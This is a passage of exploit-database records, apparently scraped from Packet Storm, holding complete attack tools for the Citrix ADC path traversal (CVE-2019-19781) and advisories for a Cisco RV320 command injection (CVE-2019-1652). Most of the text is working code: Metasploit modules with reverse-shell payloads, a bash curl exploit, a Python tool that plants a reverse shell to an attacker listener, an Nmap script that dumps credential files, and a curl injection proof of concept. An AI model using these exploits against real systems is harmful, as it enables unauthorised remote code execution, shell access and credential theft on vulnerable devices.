\nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \n \nderegister_options('RHOSTS') \nend \n \ndef execute_command(command, opts = {}) \nfilename = Rex::Text.rand_text_alpha(16) \nnonce = Rex::Text.rand_text_alpha(6) \n \nrequest = { \n'method' => 'POST', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), \n'headers' => { \n'NSC_USER' => '../../../netscaler/portal/templates/' + filename, \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => 'http://127.0.0.1', \n'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\", \n'desc' => 'desc', \n'UI_inuse' => 'RfWeb' \n}, \n'encode_params' => false \n} \n \nbegin \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \n \nif received.code == 200 \nvprint_status(\"#{received.get_html_document.text}\") \nsleep 2 \n \nrequest = { \n'method' => 'GET', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), \n'headers' => { \n'NSC_USER' => nonce, \n'NSC_NONCE' => nonce \n} \n} \n \n## Trigger to gain exploitation. \nbegin \nsend_request_cgi(request) \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \nreturn received \nend \n \nreturn false \nend \n \ndef get_chr_payload(command) \nchr_payload = command \ni = chr_payload.length \n \noutput = \"\" \nchr_payload.each_char do | c | \ni = i - 1 \noutput << \"chr(\" << c.ord.to_s << \")\" \nif i != 0 \noutput << \" . \" \nend \nend \n \nreturn output \nend \n \ndef check \nbegin \nreceived = send_request_cgi( \n\"method\" => \"GET\", \n\"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') \n) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \n \nif received && received.code != 200 \nreturn Exploit::CheckCode::Safe \nend \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nelse \nprint_good('The target appears to be vulnerable.') \nend \n \ncase target['Type'] \nwhen :cmd_generic \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nreceived = execute_command(payload.encoded) \nif (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\") \nprint_warning('Dumping command output in parsed http response') \nprint_good(\"#{received.get_html_document.text}\") \nelse \nprint_warning('Empty response, no command output') \nreturn \nend \n \nwhen :cmd_shell \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155930/citrix-exec.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155904", "href": "https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "sourceData": "`#!/bin/bash \n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 \n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' \n# Release Date : 11/01/2020 \n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia \necho \"================================================================================= \n___ _ _ ____ ___ _ _ \n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ \n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' | \n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_| \n|__/ CVE-2019-19781 \n=================================================================================\" \n############################## \nif [ -z \"$1\" ]; \nthen \necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n' \nexit; \nfi \nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); \ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is \necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \necho -ne \"Command Output :\\n\" \ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155904/citrixadcg-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T23:23:57", "description": "", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "packetstorm", "title": "Citrix ADC (NetScaler) Directory Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-14T00:00:00", "id": "PACKETSTORM:155947", "href": "https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka \nNetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload. \n}, \n'Author' => [ \n'Project Zero India', 'TrustedSec', # PoCs \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module (https://www.pirates.re/) \n], \n'References' => [ \n['CVE', '2019-19781'], \n['EDB', '47901'], \n['EDB', '47902'], \n['URL', 'https://support.citrix.com/article/CTX267027/'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => false, \n'Targets' => [ \n['Python', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON, \n'Type' => :python, \n'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'} \n], \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal', \n'HttpClientTimeout' => 3.5 \n}, \n'Notes' => { \n'AKA' => ['Shitrix'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef exploit \nunless datastore['ForceExploit'] \ncase check \nwhen CheckCode::Vulnerable \nprint_good('The target appears to be vulnerable') \nwhen CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable') \nelse \nfail_with(Failure::Unknown, 'The target vulnerability state is unknown') \nend \nend \n \nprint_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \ncase target['Type'] \nwhen :python \nexecute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\")) \nwhen :unix_command \nif (res = execute_command(payload.encoded)) && cmd_unix_generic? \nprint_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, '')) \nend \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nfilename = rand_text_alpha(8..42) \nnonce = rand_text_alpha(8..42) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'), \n'headers' => { \n'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\", \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => rand_text_alpha(8..42), \n'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\" \n} \n) \n \nunless res && res.code == 200 \nprint_error('No response to POST newbm.pl request') \nreturn \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"), \n'headers' => { \n'NSC_USER' => rand_text_alpha(8..42), \n'NSC_NONCE' => nonce \n}, \n'partial' => true \n) \n \nunless res && res.code == 200 \nprint_warning(\"No response to GET #{filename}.xml request\") \nend \n \nregister_files_for_cleanup( \n\"/netscaler/portal/templates/#{filename}.xml\", \n\"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\" \n) \n \nres \nend \n \ndef chr_payload(cmd) \ncmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155947/citrix_dir_traversal_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-16T22:49:44", "description": "", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "packetstorm", "title": "Citrix ADC / Gateway Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "PACKETSTORM:155972", "href": "https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "sourceData": "`# Exploit Title: Path Traversal in Citrix Application Delivery Controller \n(ADC) and Gateway. \n# Date: 17-12-2019 \n# CVE: CVE-2019-19781 \n# Vulenrability: Path Traversal \n# Vulnerablity Discovery: Mikhail Klyuchnikov \n# Exploit Author: Dhiraj Mishra \n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 \n# Vendor Homepage: https://www.citrix.com/ \n# References: https://support.citrix.com/article/CTX267027 \n# https://github.com/nmap/nmap/pull/1893 \n \nlocal http = require \"http\" \nlocal stdnse = require \"stdnse\" \nlocal shortport = require \"shortport\" \nlocal table = require \"table\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \nlocal io = require \"io\" \n \ndescription = [[ \nThis NSE script checks whether the traget server is vulnerable to \nCVE-2019-19781 \n]] \n--- \n-- @usage \n-- nmap --script https-citrix-path-traversal -p <port> <host> \n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args \noutput='file.txt' \n-- @output \n-- PORT STATE SERVICE \n-- 443/tcp open http \n-- | CVE-2019-19781: \n-- | Host is vulnerable to CVE-2019-19781 \n-- @changelog \n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) \n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) \n-- @xmloutput \n-- <table key=\"NMAP-1\"> \n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem> \n-- <elem key=\"state\">VULNERABLE</elem> \n-- <table key=\"description\"> \n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, \n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path \n-- traversal vulnerability that allows attackers to read configurations or \nany other file. \n-- </table> \n-- <table key=\"dates\"> \n-- <table key=\"disclosure\"> \n-- <elem key=\"year\">2019</elem> \n-- <elem key=\"day\">17</elem> \n-- <elem key=\"month\">12</elem> \n-- </table> \n-- </table> \n-- <elem key=\"disclosure\">17-12-2019</elem> \n-- <table key=\"extra_info\"> \n-- </table> \n-- <table key=\"refs\"> \n-- <elem>https://support.citrix.com/article/CTX267027</elem> \n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> \n-- </table> \n-- </table> \n \nauthor = \"Dhiraj Mishra (@RandomDhiraj)\" \nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"discovery\", \"intrusive\",\"vuln\"} \n \nportrule = shortport.ssl \n \naction = function(host,port) \nlocal outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil \nlocal vuln = { \ntitle = 'Citrix ADC Path Traversal', \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, \n12.1, and 13.0 are vulnerable \nto a unauthenticated path traversal vulnerability that allows attackers to \nread configurations or any other file. \n]], \nreferences = { \n'https://support.citrix.com/article/CTX267027', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', \n}, \ndates = { \ndisclosure = {year = '2019', month = '12', day = '17'}, \n}, \n} \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal path = \"/vpn/../vpns/cfg/smb.conf\" \nlocal response \nlocal output = {} \nlocal success = \"Host is vulnerable to CVE-2019-19781\" \nlocal fail = \"Host is not vulnerable\" \nlocal match = \"[global]\" \nlocal credentials \nlocal citrixADC \nresponse = http.get(host, port.number, path) \n \nif not response.status then \nstdnse.print_debug(\"Request Failed\") \nreturn \nend \nif response.status == 200 then \nif string.match(response.body, match) then \nstdnse.print_debug(\"%s: %s GET %s - 200 OK\", \nSCRIPT_NAME,host.targetname or host.ip, path) \nvuln.state = vulns.STATE.VULN \ncitrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname \nor host.ip,port.number, path)) \nif outputFile then \ncredentials = response.body:gsub('%W','.') \nvuln.check_results = stdnse.format_output(true, citrixADC) \nvuln.extra_info = stdnse.format_output(true, \"Credentials are being \nstored in the output file\") \nfile = io.open(outputFile, \"a\") \nfile:write(credentials, \"\\n\") \nelse \nvuln.check_results = stdnse.format_output(true, citrixADC) \nend \nend \nelseif response.status == 403 then \nstdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname \nor host.ip, path, response.status) \nvuln.state = vulns.STATE.NOT_VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155972/cadcg-traversal.nse.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155905", "href": "https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "sourceData": "`#!/usr/bin/python3 \n# \n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \n# \n# You only need a listener like netcat to catch the shell. \n# \n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White \n# \n# Tool Written by: Rob Simon and David Kennedy \n \nimport requests \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings \nimport random \nimport string \nimport time \nfrom random import randint \nimport argparse \nimport sys \n \n# random string generator \ndef randomString(stringLength=10): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \n# our random string for filename - will leave artifacts on system \nfilename = randomString() \nrandomuser = randomString() \n \n# generate random number for the nonce \nnonce = randint(5, 15) \n \n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script \n# note that the file location will be in /netscaler/portal/templates/filename.xml \ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): \n \n# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) \nencoded = \"\" \ni=0 \ntext = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport)) \nwhile i < len(text): \nencoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \" \ni += 1 \nencoded = encoded[:-3] \npayload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\" \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \ndata = ( \n{ \n\"url\" : \"127.0.0.1\", \n\"title\" : payload, \n\"desc\" : \"desc\", \n\"UI_inuse\" : \"a\" \n}) \n \nurl = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport)) \nrequests.post(url, data=data, headers=headers, verify=False) \n \n# this is our second stage that triggers the exploit for us \ndef stage2(filename, randomuser, nonce, victimip, victimport): \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '%s' % (randomuser), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \nrequests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False) \n \n \n# start our main code to execute \nprint(''' \n \n.o oOOOOOOOo OOOo \nOb.OOOOOOOo OOOo. oOOo. .adOOOOOOO \nOboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO \nOOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB' \n`O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo \n.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO \nOOOOO '\"OOOOOOOOOOOOOOOO\"` oOO \noOOOOOba. .adOOOOOOOOOOba .adOOOOo. \noOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO \nOOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO \n\"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\" \nY 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` \n: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . \n. oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo \n'%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO': \n`$\" `OOOO' `O\"Y ' `OOOO' o . \n. . OP\" : o . \n: \n \nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \nTool Written by: Rob Simon and Dave Kennedy \nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com \nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \n \nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used \nto append files in an XML format to the victim machine. This in turn allows for remote code execution. \n \nBe sure to cleanup these two file locations: \n/var/tmp/netscaler/portal/templates/ \n/netscaler/portal/templates/ \n \nUsage: \n \npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''') \n \n# parse our commands \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\") \nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\") \nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\") \nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\") \nargs = parser.parse_args() \nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\") \nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename)) \n# trigger our first post \nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) \nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\") \ntime.sleep(2) \nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\") \nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\") \nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\") \n# trigger our second post \nstage2(filename, randomuser, nonce, args.target, args.targetport) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155905/citrix-traversalexec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-03-28T22:53:28", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1652"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152262", "href": "https://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html", "sourceData": "`Advisory: Cisco RV320 Command Injection \n \nRedTeam Pentesting discovered a command injection vulnerability in the \nweb-based certificate generator feature of the Cisco RV320 router which \nwas inadequately patched by the vendor. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 through 1.4.2.20 \nFixed Versions: none \nVulnerability Type: Remote Code Execution \nSecurity Risk: medium \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject \nVendor Status: working on patch \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005 \nAdvisory Status: published \nCVE: CVE-2019-1652 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe router's web interface enables users to generate new X.509 \ncertificates directly on the device. Previously, RedTeam Pentesting \nidentified a vulnerability (rt-sa-2018-004) [2] in this component. By \nproviding a specially crafted common name, it was possible to inject \nshell commands which were subsequently executed on the router as the \nroot user. This vulnerability was adressed in firmware version 1.4.2.19 \npublished by Cisco [3]. \n \nRedTeam Pentesting discovered that the certificate generator in the patched \nfirmware is still vulnerable. The update adds several filters to handle \nsingle quotes in user input. However, these filters can be evaded by \nspecially crafted inputs. By providing the following string for the \ncertificate's common name, a \"ping\" command can be injected: \n \n------------------------------------------------------------------------ \n'a$(ping -c 4 192.168.1.2)'b \n------------------------------------------------------------------------ \n \n \nProof of Concept \n================ \n \nThe following HTTP POST request invokes the certificate generator \nfunction and triggers the command injection. It requires a valid session \ncookie for the device's web interface. The user agent \"curl\" is \nblacklisted by the firmware and must be adjusted in the HTTP client. \n \n------------------------------------------------------------------------ \n$ curl -s -k -A kurl -X POST -b \"$COOKIE\" \\ \n--data \"page=self_generator.htm&totalRules=1&OpenVPNRules=30\"\\ \n\"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A\"\\ \n\"&organization=A&organization_unit=A&email=ab%40example.com\"\\ \n\"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&\"\\ \n\"SelectSubject_s=1\" \\ \n--data-urlencode \"common_name='a\\$(ping -c 4 192.168.1.2)'b\" \\ \n\"https://192.168.1.1/certificate_handle2.htm?type=4\" \n------------------------------------------------------------------------ \n \nAfterwards, the incoming ICMP echo requests can be observed on the \nattacker's system at 192.168.1.2. \n \n \nWorkaround \n========== \n \nPrevent untrusted users from using the router's web interface. \n \n \nFix \n=== \n \nNone \n \n \nSecurity Risk \n============= \n \nThe vulnerability allows attackers with administrative access to the \nrouter's web interface to execute arbitrary operating system commands on \nthe device. Because attackers require valid credentials to the web \ninterface, this vulnerability is only rated as a medium risk. \n \n \nTimeline \n======== \n \n2018-09-19 Original vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-16 List of affected versions provided by vendor \n2019-01-22 Firmware 1.4.2.20 released by vendor \n2019-01-23 Advisory (rt-sa-2018-004) published \n \n2019-02-07 Incomplete mitigation of vulnerability identified \n2019-02-08 Proof of concept sent to vendor \n2019-02-08 Receipt of proof of concept acknowledged by vendor \n2019-02-15 Full advisory sent to vendor \n2019-02-15 Notified vendor of disclosure date: 2019-03-27 \n2019-03-25 Requested progress update from vendor \n2019-03-25 Vendor requests postponed disclosure \n2019-03-25 Postponement declined \n2019-03-27 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004 \n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152262/rt-sa-2019-005.txt", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-29T02:48:43", "description": "", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1652"], "modified": "2019-01-24T00:00:00", "id": "PACKETSTORM:151313", "href": "https://packetstormsecurity.com/files/151313/Cisco-RV320-Command-Injection.html", "sourceData": "`Advisory: Cisco RV320 Command Injection \n \nRedTeam Pentesting discovered a command injection vulnerability in the \nweb-based certificate generator feature of the Cisco RV320 router. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 and later \nFixed Versions: since 1.4.2.20 \nVulnerability Type: Remote Code Execution \nSecurity Risk: medium \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004 \nAdvisory Status: published \nCVE: CVE-2019-1652 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe router's web interface 